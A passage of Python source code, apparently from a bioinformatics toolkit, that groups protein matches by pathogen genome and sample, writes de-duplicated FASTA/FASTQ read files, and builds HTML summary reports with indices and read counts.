Add a (pathogen accession number, sample name) combination and get its
FASTA/FASTQ file name and unique read count. Write the FASTA/FASTQ file
if it does not already exist. Save the unique read count into
C{self._proteinGrouper}.
@param genomeAccession: A C{str} pathogen accession number.
@param sampleName: A C{str} sample name.
@return: A C{str} giving the FASTA/FASTQ file name holding all the
reads (without duplicates, by id) from the sample that matched the
proteins in the given pathogen.
"""
sampleIndex = self._samples.setdefault(sampleName, len(self._samples))
try:
return self._readsFilenames[(genomeAccession, sampleIndex)]
except KeyError:
reads = Reads()
for proteinMatch in self._proteinGrouper.genomeAccessions[
genomeAccession][sampleName]['proteins'].values():
for read in self._readsClass(proteinMatch['readsFilename']):
reads.add(read)
saveFilename = join(
proteinMatch['outDir'],
'pathogen-%s-sample-%d.%s' % (genomeAccession, sampleIndex,
self._format))
reads.filter(removeDuplicatesById=True)
nReads = reads.save(saveFilename, format_=self._format)
# Save the unique read count into self._proteinGrouper
self._proteinGrouper.genomeAccessions[
genomeAccession][sampleName]['uniqueReadCount'] = nReads
self._readsFilenames[
(genomeAccession, sampleIndex)] = saveFilename
return saveFilename
def lookup(self, genomeAccession, sampleName):
"""
Look up a pathogen accession number, sample name combination and get
its FASTA/FASTQ file name.
This method should be used instead of C{add} in situations where
you want an exception to be raised if a pathogen/sample combination has
not already been passed to C{add}.
@param genomeAccession: A C{str} pathogen accession number.
@param sampleName: A C{str} sample name.
@raise KeyError: If the pathogen accession number or sample name have
not been seen, either individually or in combination.
@return: A C{str} filename retrieved from self._readsFilenames
"""
return self._readsFilenames[
(genomeAccession, self._samples[sampleName])]
def writeSampleIndex(self, fp):
"""
Write a file of sample indices and names, sorted by index.
@param fp: A file-like object, opened for writing.
"""
print('\n'.join(
'%d %s' % (index, name) for (index, name) in
sorted((index, name) for (name, index) in self._samples.items())
), file=fp)
class ProteinGrouper(object):
"""
Group matched proteins by the pathogen they come from.
@param proteinGenomeDatabase: A connection to an Sqlite3 database
holding protein and genome information, as built by
C{make-protein-database.py}.
@param assetDir: The C{str} directory name where
C{noninteractive-alignment-panel.py} put its HTML, blue plot and
alignment panel images, and FASTA or FASTQ files. This must be relative
to the filenames that will later be passed to C{addFile}.
@param sampleName: A C{str} sample name. This takes precedence over
C{sampleNameRegex} (the two cannot be used together, obviously).
@param sampleNameRegex: A C{str} regular expression that can be used to
extract a short sample name from full file names subsequently passed
to C{self.addFile}. The regular expression must have a matching group
(delimited by parentheses) to capture the part of the file name that
should be used as the sample name.
@param format_: A C{str}, either 'fasta' or 'fastq' indicating the format
of the files containing the reads matching proteins.
@param saveReadLengths: If C{True}, save the lengths of all reads matching
proteins.
@param titleRegex: A regex that pathogen names must match.
Note that this matching is done on the final part of the protein title
in square brackets, according to the convention used by the NCBI viral
refseq database and RVDB.
@param negativeTitleRegex: A regex that pathogen names must not match.
Note that this matching is done on the final part of the protein title
in square brackets, according to the convention used by the NCBI viral
refseq database and RVDB.
@param pathogenDataDir: The C{str} directory where per-pathogen information
(e.g., collected reads across all samples) should be written. Will be
created (in C{self.toHTML}) if it doesn't exist.
@raise ValueError: If C{format_} is unknown.
"""
VIRALZONE = 'https://viralzone.expasy.org/search?query='
ICTV = 'https://talk.ictvonline.org/search-124283882/?q='
READCOUNT_MARKER = '*READ-COUNT*'
READ_AND_HSP_COUNT_STR_SEP = '/'
def __init__(self, proteinGenomeDatabase, taxonomyDatabase, assetDir='out',
sampleName=None, sampleNameRegex=None, format_='fasta',
saveReadLengths=False, titleRegex=None,
negativeTitleRegex=None, pathogenDataDir='pathogen-data'):
self._db = proteinGenomeDatabase
self._taxdb = taxonomyDatabase
self._assetDir = assetDir
self._sampleName = sampleName
self._sampleNameRegex = (re.compile(sampleNameRegex) if sampleNameRegex
else None)
if format_ in ('fasta', 'fastq'):
self._format = format_
else:
raise ValueError("format_ must be either 'fasta' or 'fastq'.")
self._saveReadLengths = saveReadLengths
if titleRegex or negativeTitleRegex:
self.titleFilter = TitleFilter(
positiveRegex=titleRegex, negativeRegex=negativeTitleRegex)
else:
self.titleFilter = None
self._pathogenDataDir = pathogenDataDir
# genomeAccessions will be a dict of dicts of dicts. The first
# two keys will be a pathogen accession and a sample name. The
# final dict will contain 'proteins' (a list of dicts) and
# 'uniqueReadCount' (an int).
self.genomeAccessions = defaultdict(dict)
# sampleNames is keyed by sample name and will have values that hold
# the sample's alignment panel index.html file.
self.sampleNames = {}
self.pathogenSampleFiles = PathogenSampleFiles(self, format_=format_)
def _title(self, pathogenType):
"""
Create a title summarizing the pathogens and samples.
@param pathogenType: A C{str}, either 'viral' or 'bacterial'.
@return: A C{str} title.
"""
assert pathogenType in ('viral', 'bacterial')
nPathogens = len(self.genomeAccessions)
nSamples = len(self.sampleNames)
if pathogenType == 'bacterial':
what = 'bacterium' if nPathogens == 1 else 'bacteria'
else:
what = 'virus%s' % ('' if nPathogens == 1 else 'es')
return (
'Proteins from %d %s were found in %d sample%s.' %
(nPathogens, what, nSamples, '' if nSamples == 1 else 's'))
def addFile(self, filename, fp):
"""
Read and record protein information for a sample.
@param filename: A C{str} file name.
@param fp: An open file pointer to read the file's data from.
@raise ValueError: If information for a pathogen/protein/sample
combination is given more than once.
"""
if self._sampleName:
sampleName = self._sampleName
elif self._sampleNameRegex:
match = self._sampleNameRegex.search(filename)
if match:
sampleName = match.group(1)
else:
sampleName = filename
else:
sampleName = filename
outDir = join(dirname(filename), self._assetDir)
self.sampleNames[sampleName] = join(outDir, 'index.html')
for index, proteinLine in enumerate(fp):
(coverage, medianScore, bestScore, readCount, hspCount,
proteinLength, longName) = proteinLine.split(None, 6)
proteinInfo = self._db.findProtein(longName)
if proteinInfo is None:
try:
accession = self._db.proteinAccession(longName)
except IndexError:
accession = longName
# We could arguably just emit a warning here. This situation
# arises (at least) when we are re-processing output from an
# earlier run that used a different genome/protein
# database. For example, the host specificity information about
# a virus might change or the NCBI might withdraw it, causing
# it to be excluded from a new database that we make. If an
# now-not-present accession number appears in the DIAMOND or
# alignment panel summary protein file, it will trigger this
# error.
#
# For now I (Terry) have decided to keep things strict here and
# raise an Exception. Otherwise I don't think there's any
# guarantee that a warning to stderr would be seen, and only
# issuing a warning would risk silently being in a situation
# where nothing at all matched, e.g., due to passing an
# incorrect database name. This error happens infrequently and
# IMO it's better that we cause an error, force the user
# (usually me, unfortunately) to investigate, clean up
# properly, and re-run.
raise ValueError(
'Could not find protein info for accession number %r '
'(extracted from %r). In the past, this hard-to-debug '
'(hence this long message!) error has resulted from using '
'a new genome/protein database to process results that '
'were generated based on an earlier version of the '
'database, in which case proteins that were present then '
'are not now in the database.' % (accession, longName))
proteinName = (proteinInfo['product'] or proteinInfo['gene'] or
'unknown')
proteinAccession = proteinInfo['accession']
genomeInfo = self._db.findGenome(longName)
genomeName = genomeInfo['name']
genomeAccession = genomeInfo['accession']
# Ignore genomes with names we don't want.
if (self.titleFilter and self.titleFilter.accept(
genomeName) == TitleFilter.REJECT):
continue
if sampleName not in self.genomeAccessions[genomeAccession]:
self.genomeAccessions[genomeAccession][sampleName] = {
'proteins': {},
'uniqueReadCount': None,
}
proteins = self.genomeAccessions[
genomeAccession][sampleName]['proteins']
# We should only receive one line of information for a given
# genome/sample/protein combination.
if proteinAccession in proteins:
raise ValueError(
'Protein %r already seen for genome %r (%s) sample %r.' %
(proteinAccession, genomeName, genomeAccession,
sampleName))
readsFilename = join(outDir,
'%s.%s' % (proteinAccession, self._format))
if longName.startswith(SqliteIndexWriter.SEQUENCE_ID_PREFIX +
SqliteIndexWriter.SEQUENCE_ID_SEPARATOR):
proteinURL = NCBISequenceLinkURL(longName, field=2)
genomeURL = NCBISequenceLinkURL(longName, field=4)
else:
proteinURL = genomeURL = None
proteinInfo = proteins[proteinAccession] = {
'accession': proteinAccession,
'bestScore': float(bestScore),
'bluePlotFilename': join(outDir, '%s.png' % proteinAccession),
'coverage': float(coverage),
'readsFilename': readsFilename,
'hspCount': int(hspCount),
'index': index,
'medianScore': float(medianScore),
'outDir': outDir,
'proteinLength': int(proteinLength),
'proteinName': proteinName,
'proteinURL': proteinURL,
'genomeURL': genomeURL,
'readCount': int(readCount),
}
if proteinInfo['readCount'] == proteinInfo['hspCount']:
proteinInfo['readAndHspCountStr'] = readCount
else:
proteinInfo['readAndHspCountStr'] = '%s%s%s' % (
readCount, self.READ_AND_HSP_COUNT_STR_SEP, hspCount)
if self._saveReadLengths:
readsClass = (FastaReads if self._format == 'fasta'
else FastqReads)
proteins[proteinName]['readLengths'] = tuple(
len(read) for read in readsClass(readsFilename))
def _computeUniqueReadCounts(self):
"""
Add all pathogen / sample combinations to self.pathogenSampleFiles.
This will make all de-duplicated (by id) FASTA/FASTQ files and store
the number of de-duplicated reads into C{self.genomeAccessions}.
"""
for genomeAccession, samples in self.genomeAccessions.items():
for sampleName in samples:
self.pathogenSampleFiles.add(genomeAccession, sampleName)
def toStr(self, title=None, preamble=None, pathogenType='viral'):
"""
Produce a string representation of the pathogen summary.
@param title: The C{str} title for the output.
@param preamble: The C{str} descriptive preamble, or C{None} if no
preamble is needed.
@param pathogenType: A C{str}, either 'viral' or 'bacterial'.
@return: A C{str} suitable for printing.
"""
# Note that the string representation contains much less
# information than the HTML summary. E.g., it does not contain the
# unique (de-duplicated, by id) read count, since that is only computed
# when we are making combined FASTA files of reads matching a
# pathogen.
assert pathogenType in ('viral', 'bacterial')
title = title or 'Summary of %s.' % (
'bacteria' if pathogenType == 'bacterial' else 'viruses')
readCountGetter = itemgetter('readCount')
result = []
append = result.append
result.extend((title, ''))
if preamble:
result.extend((preamble, ''))
result.extend((self._title(pathogenType), ''))
for genomeAccession, samples in self.genomeAccessions.items():
genomeInfo = self._db.findGenome(genomeAccession)
genomeName = genomeInfo['name']
sampleCount = len(samples)
append('%s (in %d sample%s)' %
(genomeName,
sampleCount, '' if sampleCount == 1 else 's'))
for sampleName in sorted(samples):
proteins = samples[sampleName]['proteins']
proteinCount = len(proteins)
totalReads = sum(readCountGetter(p) for p in proteins.values())
append(' %s (%d protein%s, %d read%s)' %
(sampleName,
proteinCount, '' if proteinCount == 1 else 's',
totalReads, '' if totalReads == 1 else 's'))
for proteinName in sorted(proteins):
append(
' %(coverage).2f\t%(medianScore).2f\t'
'%(bestScore).2f\t%(readAndHspCountStr)3s\t'
'%(proteinName)s'
% proteins[proteinName])
append('')
return '\n'.join(result)
def _genomeName(self, genomeAccession):
"""
Get the name of a genome, given its accession number.
@param genomeAccession: A C{str} pathogen accession number.
@return: A C{str} genome name.
"""
return self._db.findGenome(genomeAccession)['organism']
def _makeSampleSorter(self):
"""
Make a function to sort sample names with, using the 3rd
underscore-separated field of each name as an integer, if possible.
"""
# Note: we could do this without the allSampleNamesHaveIntThirdField
# variable by defining a function in the 'except' clause and adding an
# 'else' to the 'for' loop, but that causes flake8 to complain that the
# unused _key function (in the except) has been redefined (in the
# else).
allSampleNamesHaveIntThirdField = True
for sampleName in self.sampleNames:
try:
int(sampleName.split('_', maxsplit=3)[2])
except (IndexError, ValueError):
allSampleNamesHaveIntThirdField = False
break
if allSampleNamesHaveIntThirdField:
def _key(sampleName):
return int(sampleName.split('_', maxsplit=3)[2])
else:
def _key(sampleName):
return sampleName
self.sampleSort = partial(sorted, key=_key)
def toHTML(self, pathogenPanelFilename=None, readCountColors=None,
minProteinFraction=0.0, minProteinCount=0,
pathogenType='viral', title=None, preamble=None,
sampleIndexFilename=None, omitVirusLinks=False,
bootstrapTreeviewDir=None):
"""
Produce an HTML string representation of the pathogen summary.
@param pathogenPanelFilename: If not C{None}, a C{str} filename to
write a pathogen panel PNG image to.
@param readCountColors: Either a C{dark.colors.colorsForCounts}
instance or C{None} for no read count coloring.
@param minProteinFraction: The C{float} minimum fraction of proteins
in a pathogen that must be matched by a sample in order for that
pathogen to be displayed for that sample.
@param minProteinCount: The C{int} minimum number of proteins
in a pathogen that must be matched by a sample in order for that
pathogen to be displayed for that sample.
@param pathogenType: A C{str} giving the type of the pathogen involved,
either 'bacterial' or 'viral'.
@param title: The C{str} title for the HTML page or C{None} to get a
default generic title depending on whether a viral or bacterial
database was matched against.
@param preamble: The C{str} descriptive preamble for the HTML page, or
C{None} if no preamble is needed.
@param sampleIndexFilename: A C{str} filename to write a sample index
file to. Lines in the file will have an integer index, a space, and
then the sample name.
@param omitVirusLinks: If C{True}, links to ICTV and ViralZone will be
omitted in output.
@param bootstrapTreeviewDir: A C{str} giving the directory where the
bootstrap-treeview JS and CSS files may be found. Or C{None} if no
bootstrap-treeview output should be generated.
@return: An HTML C{str} suitable for printing.
"""
if pathogenType == 'bacterial':
singular, plural = 'bacterium', 'bacteria'
elif pathogenType == 'viral':
singular, plural = 'virus', 'viruses'
else:
raise ValueError(
"Unrecognized pathogenType argument: %r. Value must be either "
"'bacterial' or 'viral'." % pathogenType)
if not exists(self._pathogenDataDir):
os.mkdir(self._pathogenDataDir)
title = title or 'Summary of ' + plural
self._makeSampleSorter()
self._computeUniqueReadCounts()
if sampleIndexFilename:
with open(sampleIndexFilename, 'w') as fp:
self.pathogenSampleFiles.writeSampleIndex(fp)
# Figure out if we have to delete some pathogens because the number
# or fraction of its proteins that we have matches for is too low.
if minProteinFraction > 0.0 or minProteinCount > 0:
toDelete = defaultdict(list)
for genomeAccession in self.genomeAccessions:
genomeInfo = self._db.findGenome(genomeAccession)
pathogenProteinCount = genomeInfo['proteinCount']
assert pathogenProteinCount > 0
for s in self.genomeAccessions[genomeAccession]:
sampleProteinCount = len(self.genomeAccessions[
genomeAccession][s]['proteins'])
if sampleProteinCount < minProteinCount:
toDelete[genomeAccession].append(s)
else:
sampleProteinFraction = (
sampleProteinCount / pathogenProteinCount)
if sampleProteinFraction < minProteinFraction:
toDelete[genomeAccession].append(s)
for genomeAccession, samples in toDelete.items():
for sample in samples:
del self.genomeAccessions[genomeAccession][sample]
genomeAccessions = sorted(
(genomeAccession for genomeAccession in self.genomeAccessions
if len(self.genomeAccessions[genomeAccession]) > 0),
key=self._genomeName)
nPathogenNames = len(genomeAccessions)
sampleNames = self.sampleSort(self.sampleNames)
# Be very careful with commas in the following! Long lines that
# should be continued unbroken must not end with a comma.
result = [
'<html>',
'<head>',
'<title>',
title,
'</title>',
'<meta charset="UTF-8">',
'<link rel="stylesheet"',
'href="https://stackpath.bootstrapcdn.com/bootstrap/'
'3.4.1/css/bootstrap.min.css"',
'integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5z'
'CYotlSAcp1+c8xmyTe9GYg1l9a69psu"',
'crossorigin="anonymous">',
]
if bootstrapTreeviewDir:
result.append(
'<link rel="stylesheet" href="%s/bootstrap-treeview.min.css">'
% bootstrapTreeviewDir)
result.extend([
'</head>',
'<body>',
'<script',
'src="https://code.jquery.com/jquery-3.4.1.min.js"',
'integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo="',
'crossorigin="anonymous"></script>',
'<script',
'src="https://stackpath.bootstrapcdn.com/bootstrap/'
'3.4.1/js/bootstrap.min.js"',
'integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5b'
'ApTppSuUkhZXN0VxHd"',
'crossorigin="anonymous"></script>'])
if bootstrapTreeviewDir:
result.append(
'<script src="%s/bootstrap-treeview.min.js"></script>'
% bootstrapTreeviewDir)
result.extend([
'<style>',
'''\
body {
margin-left: 2%;
margin-right: 2%;
}
hr {
display: block;
margin-top: 0.5em;
margin-bottom: 0.5em;
margin-left: auto;
margin-right: auto;
border-style: inset;
border-width: 1px;
}
p.pathogen {
margin-top: 10px;
margin-bottom: 3px;
}
p.sample {
margin-top: 10px;
margin-bottom: 3px;
}
.sample {
margin-top: 5px;
margin-bottom: 2px;
}
ul {
margin-bottom: 2px;
}
.indented {
margin-left: 2em;
}
.sample-name {
font-size: 115%;
font-weight: bold;
}
.pathogen-name {
font-size: 115%;
font-weight: bold;
}
.index-name {
font-weight: bold;
}
.index {
font-size: small;
}
.index-letter {
font-size: 115%;
font-weight: bold;
}
.host {
font-size: small;
}
.taxonomy {
font-size: small;
}
.protein-name {
}
.stats {
font-family: "Courier New", Courier, monospace;
white-space: pre;
}
.protein-list {
margin-top: 2px;
}''',
'</style>',
'</head>',
'<body>',
])
append = result.append
proteinFieldsDescription = self._help(readCountColors, result)
append('<h2>%s</h2>' % title)
append(self._title(pathogenType))
if preamble:
append(preamble)
if minProteinFraction > 0.0:
append('<p>')
percent = minProteinFraction * 100.0
if nPathogenNames < len(self.genomeAccessions):
if nPathogenNames == 1:
append('Pathogen protein fraction filtering has been '
'applied, so information on only 1 pathogen is '
'displayed. This is the only pathogen for which at '
'least one sample matches at least %.2f%% of the '
'pathogen proteins.' % percent)
else:
append('Pathogen protein fraction filtering has been '
'applied, so information on only %d pathogens is '
'displayed. These are the only pathogens for which '
'at least one sample matches at least %.2f%% of '
'the pathogen proteins.' % (nPathogenNames,
percent))
else:
append('Pathogen protein fraction filtering was applied, '
'but all pathogens have at least %.2f%% of their '
'proteins matched by at least one sample.' % percent)
append('</p>')
if pathogenPanelFilename and genomeAccessions:
self.pathogenPanel(pathogenPanelFilename)
append('<p>')
append('<a href="%s">Panel showing read count per pathogen, '
'per sample.</a>' % pathogenPanelFilename)
append('Red vertical bars indicate samples with an unusually '
'high read count.')
append('</p>')
result.extend(proteinFieldsDescription)
append('<p style="margin-top: 10px;">Global: ')
append('<button type="button" class="btn btn-default btn-sm" '
'id="expand-all-button">Expand all</button>')
append('<button type="button" class="btn btn-default btn-sm" '
'id="collapse-all-button">Collapse all</button>')
append('</p>')
append('''
<script>
$("#expand-all-button").click(function(){
$(".collapse").collapse("show");
});
$("#collapse-all-button").click(function(){
$(".collapse").collapse("hide");
});
</script>
''')
append('<h2>Indices</h2>')
self._sampleIndex(sampleNames, result)
self._pathogenIndex(genomeAccessions, result, singular, plural)
self._samplesToHTML(
result, pathogenType, omitVirusLinks, sampleNames, readCountColors,
singular, plural)
self._pathogensToHTML(
result, pathogenType, genomeAccessions, omitVirusLinks,
readCountColors, bootstrapTreeviewDir, plural)
append('</body>')
append('</html>')
return '\n'.join(result)
def _samplesToHTML(self, result, pathogenType, omitVirusLinks,
sampleNames, readCountColors, singular, plural):
"""
Write all samples (with pathogens (with proteins)).
"""
append = result.append
append('<h2>Samples</h2>')
for sampleName in sampleNames:
samplePathogenAccessions = sorted(
(accession for accession in self.genomeAccessions
if sampleName in self.genomeAccessions[accession]),
key=self._genomeName)
append('<div>')
append('<button type="button" class="btn btn-default btn-sm" '
'data-toggle="collapse" data-target="#sample-%s-collapse">'
'<span class="glyphicon glyphicon-plus"></span></button>' %
sampleName)
if len(samplePathogenAccessions):
append(
'<a id="sample-%s"></a>'
'<span class="sample"><span class="sample-name">%s</span> '
'matched proteins from %d %s, '
'<a href="%s">panel</a>.</span>' %
(sampleName, sampleName, len(samplePathogenAccessions),
(singular if len(samplePathogenAccessions) == 1
else plural),
self.sampleNames[sampleName]))
else:
append(
'<a id="sample-%s"></a>'
'<span class="sample">'
'<span class="sample-name">%s</span> '
'did not match anything.</span>' %
(sampleName, sampleName))
continue
append('</div>')
append('<div class="collapse" id="sample-%s-collapse">' %
sampleName)
for genomeAccession in samplePathogenAccessions:
genomeInfo = self._db.findGenome(genomeAccession)
readsFileName = self.pathogenSampleFiles.lookup(
genomeAccession, sampleName)
proteins = self.genomeAccessions[genomeAccession][sampleName][
'proteins']
uniqueReadCount = self.genomeAccessions[
genomeAccession][sampleName]['uniqueReadCount']
proteinCount = len(proteins)
pathogenProteinCount = genomeInfo['proteinCount']
proteinCountStr = '%d/%d protein%s' % (
proteinCount, pathogenProteinCount,
'' if pathogenProteinCount == 1 else 's')
pathogenLinksHTML = ' (%s' % NCBISequenceLink(genomeAccession)
if pathogenType == 'viral' and not omitVirusLinks:
quoted = quote(genomeInfo['organism'])
pathogenLinksHTML += (
', <a href="%s%s">ICTV</a>, '
'<a href="%s%s">ViralZone</a>)'
) % (self.ICTV, quoted, self.VIRALZONE, quoted)
else:
pathogenLinksHTML += ')'
append(
'<p class="sample indented">'
'<a href="#pathogen-%s">%s</a> %s %s, '
'<a href="%s">%d read%s</a>:</p>' %
(genomeAccession, genomeInfo['organism'],
pathogenLinksHTML, proteinCountStr, readsFileName,
uniqueReadCount, '' if uniqueReadCount == 1 else 's'))
append('<ul class="protein-list indented">')
for proteinAccession in sorted(proteins):
proteinMatch = proteins[proteinAccession]
append(
'<li>'
'<span class="stats">'
'%(coverage).2f %(medianScore)6.2f %(bestScore)6.2f '
% proteinMatch)
if readCountColors:
countClass = readCountColors.thresholdToCssName(
readCountColors.thresholdForCount(
proteinMatch['readCount']))
self._appendNoSpace('<span class="%s">%4s</span>' % (
countClass, proteinMatch['readAndHspCountStr']),
result)
else:
self._appendNoSpace('%(readAndHspCountStr)3s' %
proteinMatch, result)
self._appendNoSpace(
'</span> '
'<span class="protein-name">'
'%(proteinName)s'
'</span> '
'(%(proteinLength)d aa,'
% proteinMatch, result)
if proteinMatch['proteinURL']:
append('<a href="%s">%s</a>, ' % (
proteinMatch['proteinURL'],
proteinMatch['accession']))
append(
'<a href="%(bluePlotFilename)s">blue plot</a>, '
'<a href="%(readsFilename)s">reads</a>)'
% proteinMatch)
append('</li>')
append('</ul>')
append('</div>')
def _pathogensToHTML(self, result, pathogenType, genomeAccessions,
omitVirusLinks, readCountColors,
bootstrapTreeviewDir, plural):
"""
Write all pathogens (with samples (with proteins)).
"""
append = result.append
append('<h2>%s</h2>' % plural.title())
if bootstrapTreeviewDir:
# A <div> to hold the taxonomy tree.
append('<div id="tree"></div>')
taxonomyHierarchy = Hierarchy()
for genomeAccession in genomeAccessions:
samples = self.genomeAccessions[genomeAccession]
sampleCount = len(samples)
genomeInfo = self._db.findGenome(genomeAccession)
pathogenProteinCount = genomeInfo['proteinCount']
lineage = (None if genomeInfo['taxonomyId'] is None
else self._taxdb.lineage(genomeInfo['taxonomyId']))
if lineage:
taxonomyHierarchy.add(lineage, genomeAccession)
lineageHTML = ', '.join(lineageTaxonomyLinks(lineage))
else:
lineageHTML = ''
pathogenLinksHTML = ' %s, %s' % (
genomeInfo['databaseName'],
NCBISequenceLink(genomeAccession))
if pathogenType == 'viral' and not omitVirusLinks:
quoted = quote(genomeInfo['organism'])
pathogenLinksHTML += (
', <a href="%s%s">ICTV</a>, <a href="%s%s">ViralZone</a>.'
) % (self.ICTV, quoted, self.VIRALZONE, quoted)
else:
pathogenLinksHTML += '.'
proteinCountStr = (' %d protein%s' %
(pathogenProteinCount,
'' if pathogenProteinCount == 1 else 's'))
pathogenReadsFilename = join(
self._pathogenDataDir,
'pathogen-%s.%s' % (genomeAccession, self._format))
pathogenReadsFp = open(pathogenReadsFilename, 'w')
pathogenReadCount = 0
append('<div>') # Button and following summary.
append('<button type="button" class="btn btn-default btn-sm" '
'data-toggle="collapse" '
'data-target="#pathogen-%s-collapse">'
'<span class="glyphicon glyphicon-plus"></span></button>' %
genomeAccession.replace('.', '-'))
append(
'<a id="pathogen-%s"></a>'
'<span class="pathogen">'
'<span class="pathogen-name">%s</span> '
'<span class="host">(%s)</span>'
'<br/>%d nt, %s, '
'matched by %d sample%s, '
'<a href="%s">%s</a> in total. '
'%s'
'<br/><span class="taxonomy">Taxonomy: %s.</span>'
'</span>' %
(genomeAccession,
genomeInfo['organism'],
genomeInfo.get('host') or 'unknown host',
genomeInfo['length'],
proteinCountStr,
sampleCount, '' if sampleCount == 1 else 's',
pathogenReadsFilename, self.READCOUNT_MARKER,
pathogenLinksHTML,
lineageHTML))
# Remember where we are in the output result so we can fill in
# the total read count once we have processed all samples for
# this pathogen. Not nice, I know.
pathogenReadCountLineIndex = len(result) - 1
append('</div>') # End of button summary.
append('<div class="collapse" id="pathogen-%s-collapse">' %
genomeAccession.replace('.', '-'))
for sampleName in self.sampleSort(samples):
readsFileName = self.pathogenSampleFiles.lookup(
genomeAccession, sampleName)
# Copy the read data from the per-sample reads for this
# pathogen into the per-pathogen file of reads.
with open(readsFileName) as readsFp:
while True:
data = readsFp.read(4096)
if data:
pathogenReadsFp.write(data)
else:
break
proteins = samples[sampleName]['proteins']
proteinCount = len(proteins)
uniqueReadCount = samples[sampleName]['uniqueReadCount']
pathogenReadCount += uniqueReadCount
proteinCountHTML = '%d protein%s, ' % (
proteinCount, '' if proteinCount == 1 else 's')
append(
'<p class="sample indented">'
'Sample <a href="#sample-%s">%s</a> '
'(%s<a href="%s">%d '
'read%s</a>, <a href="%s">panel</a>).</p>' %
(sampleName, sampleName,
proteinCountHTML,
readsFileName,
uniqueReadCount, '' if uniqueReadCount == 1 else 's',
self.sampleNames[sampleName]))
append('<ul class="protein-list indented">')
for proteinName in sorted(proteins):
proteinMatch = proteins[proteinName]
append(
'<li>'
'<span class="stats">'
'%(coverage).2f %(medianScore)6.2f %(bestScore)6.2f '
% proteinMatch
)
if readCountColors:
countClass = readCountColors.thresholdToCssName(
readCountColors.thresholdForCount(
proteinMatch['readCount']))
self._appendNoSpace('<span class="%s">%4s</span>' % (
countClass, proteinMatch['readAndHspCountStr']),
result)
else:
self._appendNoSpace('%(readAndHspCountStr)3s' %
proteinMatch, result)
if self._saveReadLengths:
self._appendNoSpace(' (%s)' % ', '.join(
map(str, sorted(proteinMatch['readLengths']))),
result)
self._appendNoSpace(
'</span> '
'<span class="protein-name">'
'%(proteinName)s'
'</span> '
'(%(proteinLength)d aa,'
% proteinMatch, result)
if proteinMatch['proteinURL']:
append('<a href="%s">%s</a>, ' % (
proteinMatch['proteinURL'],
proteinMatch['accession']))
append(
'<a href="%(bluePlotFilename)s">blue plot</a>, '
'<a href="%(readsFilename)s">reads</a>)'
% proteinMatch)
append('</li>')
append('</ul>')
append('</div>')
pathogenReadsFp.close()
# Sanity check there's a read count marker text in our output
# where we expect it.
readCountLine = result[pathogenReadCountLineIndex]
if readCountLine.find(self.READCOUNT_MARKER) == -1:
raise ValueError(
'Could not find pathogen read count marker (%s) in result '
'index %d text (%s).' %
(self.READCOUNT_MARKER, pathogenReadCountLineIndex,
readCountLine))
# Put the read count into the pathogen summary line we wrote
# earlier, replacing the read count marker with the correct
# text.
result[pathogenReadCountLineIndex] = readCountLine.replace(
self.READCOUNT_MARKER,
'%d read%s' % (pathogenReadCount,
'' if pathogenReadCount == 1 else 's'))
if bootstrapTreeviewDir:
append('''
<script>
$(document).ready(function(){
var tree = %s;
$('#tree').treeview({
data: tree,
enableLinks: true,
levels: 0,
});
});
</script>
''' % taxonomyHierarchy.toJSON())
def _help(self, readCountColors, result):
append = result.append
append('''
<script>
$(document).ready(function(){
$("#help-button").click(function(){
var self=$(this);
if (self.val() === "Show"){
self.val("Hide");
}
else {
self.val("Show");
}
$("#help-details").toggle();
});
});
</script>
''')
if readCountColors:
levels = []
append('<style>')
for threshold, color in readCountColors.colors:
klass = readCountColors.thresholdToCssName(threshold)
append('.%s { color: %s; font-weight: bold; }' %
(klass, color))
levels.append('<span class="%s">%d</span>' %
(klass, threshold))
append('</style>')
readCountColorLegend = (
' Color levels: ' + ', '.join(reversed(levels)) + '.')
else:
readCountColorLegend = ''
proteinFieldsDescription = [
'Help: <button type="button" class="btn btn-default btn-sm" '
'id="help-button">Show</button><br>',
'<div id="help-details" style="display:none;">',
'In all bullet point protein lists below, there are the following '
'numeric fields:',
'<ol>',
'<li>Coverage fraction.</li>',
'<li>Median bit score.</li>',
'<li>Best bit score.</li>',
'<li>Read count (if read and HSP counts differ, ',
('both are given, separated by "%s").%s</li>' %
(self.READ_AND_HSP_COUNT_STR_SEP, readCountColorLegend)),
]
if self._saveReadLengths:
proteinFieldsDescription.append(
'<li>All read lengths (in parentheses).</li>')
proteinFieldsDescription.extend([
'</ol>',
'</div>',
])
return proteinFieldsDescription
def _appendNoSpace(self, s, result):
assert result, ('Cannot append %r to empty result list' % s)
result[-1] += s
def _sampleIndex(self, sampleNames, result):
"""
Write a linked table of contents by sample.
"""
append = result.append
if len(sampleNames) == 1:
title = 'Sample'
else:
title = 'Samples (%d)' % len(sampleNames)
append('<p><span class="index-name">%s:</span>' % title)
append('<span class="index">')
for count, sampleName in enumerate(sampleNames, start=1):
append('<span class="index-letter">%d</span> '
'<a href="#sample-%s">%s</a>' %
(count, sampleName, sampleName))
append('·')
# Get rid of final middle dot and add a period.
result.pop()
self._appendNoSpace('.', result)
append('</span></p>')
def _pathogenIndex(self, genomeAccessions, result, singular, plural):
"""
Create a linked table of contents by pathogen.
"""
append = result.append
if len(genomeAccessions) == 1:
title = singular.title()
else:
title = '%s (%d)' % (plural.title(), len(genomeAccessions))
append('<p><span class="index-name">%s:</span>' % title)
append('<span class="index">')
lastLetter = None
for genomeAccession in genomeAccessions:
genomeInfo = self._db.findGenome(genomeAccession)
organism = genomeInfo['organism']
letter = organism[0]
if letter != lastLetter:
append('<span class="index-letter">%s</span>' % letter)
lastLetter = letter
append('<a href="#pathogen-%s">%s</a>' % (genomeAccession,
genomeInfo['organism']))
append('·')
# Get rid of final middle dot and add a period.
result.pop()
self._appendNoSpace('.', result)
append('</span></p>')
def _pathogenSamplePlot(self, genomeAccession, sampleNames, ax):
"""
Make an image of a graph giving pathogen read count (Y axis) versus
sample id (X axis).
@param genomeAccession: A C{str} pathogen accession number.
@param sampleNames: A sorted C{list} of sample names.
@param ax: A matplotlib C{axes} instance.
"""
readCounts = []
for sampleName in sampleNames:
try:
readCount = self.genomeAccessions[genomeAccession][sampleName][
'uniqueReadCount']
except KeyError:
readCount = 0
readCounts.append(readCount)
highlight = 'r'
normal = 'gray'
sdMultiple = 2.5
minReadsForHighlighting = 10
highlighted = []
if len(readCounts) == 1:
if readCounts[0] > minReadsForHighlighting:
color = [highlight]
highlighted.append(sampleNames[0])
else:
color = [normal]
else:
